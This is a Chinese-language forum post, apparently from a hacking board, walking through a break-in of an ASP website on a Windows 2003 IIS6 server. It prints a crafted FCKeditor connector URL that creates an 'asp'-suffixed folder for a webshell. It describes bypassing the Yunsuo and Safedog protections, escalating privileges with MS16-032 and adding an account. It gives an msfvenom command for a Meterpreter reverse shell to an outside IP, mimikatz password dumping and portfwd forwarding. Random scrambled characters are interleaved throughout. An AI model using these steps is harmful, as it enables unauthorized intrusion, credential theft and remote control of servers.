|
, Y: s0 l' T; Q9 y; s1 Z$ Z
6 w7 Z8 m: G# L! x& I3 P5 g ) x0 m/ r3 b0 h$ x
. b7 F2 X5 z. o k7 U
| 1 ]& O, ], I( h1 J$ ?% n
1 g' G+ y- o7 S/ M$ P0 [& K7 b
5 G# F# p+ ^1 Z0 y/ ]* A' U# B
一、 利用getwebshell篇
( @$ u& Z6 X$ w! D
# Y! Y* z: K/ T" J( `( _4 e首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
- t5 M' p3 u, D; T( l$ x* a" n
4 C; n2 D% @' S u" T- s h. Z
8 \) ^) W5 U' B& Y& K
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
4 G% | u9 b! c7 ^( M/ A' j
6 ^( r! W; `$ A+ C2 Z+ c下面我们构造一个asp目录,如: * m. n. [2 X- ^% S: h
9 C& y7 j+ K8 D/ X. _ w! T 2 V0 z& _9 t7 ? }. x+ |
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 , A" E! X' i2 Y! Z* c+ | n
5 m/ w0 R( T. b$ {9 Z 2 p# r4 Y- ?# O6 r9 r
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
, a+ z* W L8 ^1 U
% T8 ~! K( \+ ?" g7 a& a( ?% y5 r
一、 绕过安全狗云锁提权并且加账号
( ?4 b1 X8 H3 Z2 _/ d. `8 u
/ ~) d o: Y+ g
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
/ Z d$ _' J! J" ^/ Y& e! E
2 ~" q& y+ ?4 ^如图:
3 z. n, L+ N$ z8 M4 w+ d
& ~# P" b4 @& d6 \- C) @然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
. e! D$ s. L q Z
. v9 d5 Q- D4 P9 I5 _: R7 ~一、 利用metasploit
* i' {0 [; t+ f' Y1 ~
9 P8 B r1 v; @首先用pentestbox生成一个64位的payload如下命令
3 q+ q1 p6 B- F1 {5 ]& O3 Z- ~
' ^7 I& L2 u" [$ O W$ WmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
& y$ q- C: A, `7 k; }
) M' u* e5 P- Q. m( b" b% |3 u
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
8 j' [7 q! [* X7 N1 w
3 l; {" l S+ h X4 M& V下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
2 ~. i9 m( S2 T6 q/ T- ~
( {* J% U: j) R7 a9 d% x7 ]
下面我们来做一个监听如下命令:
2 n# Y: V' u; H
+ c- n* x( ^" F
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
: B; o0 i) v& X) p$ v. O
 & s$ E$ h) A1 C( j9 Z
/ w6 i4 o2 C3 j, R. A$ W8 R6 T
| 6 s- a1 v k" F* E. }7 R3 |) T- q0 X
; z+ J5 D% R) v5 i 1 k; c$ m, T' i! P: c& i: _
0 R& R! ~# a, N7 ]0 {6 x
+ X4 J# _$ M- f# V* l
) i5 o1 s, I) X) \: Z7 I' ^* ?. B# A
- R/ e& S8 f4 r
* ]9 e7 j( B3 m! i2 w; U! I8 c" t8 q 7 X7 i& v. J( Q2 }
& h: u- ?6 U b& Q `4 z
' u3 `, T7 z" l+ ~0 r3 \+ j; X " P& A% B/ t. d3 z. r3 Z; M( Z5 g: @
& n$ n" g: m' t+ m. n+ _/ U# p3 j
* H. i( J! l2 H: t$ D) @; v1 P | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06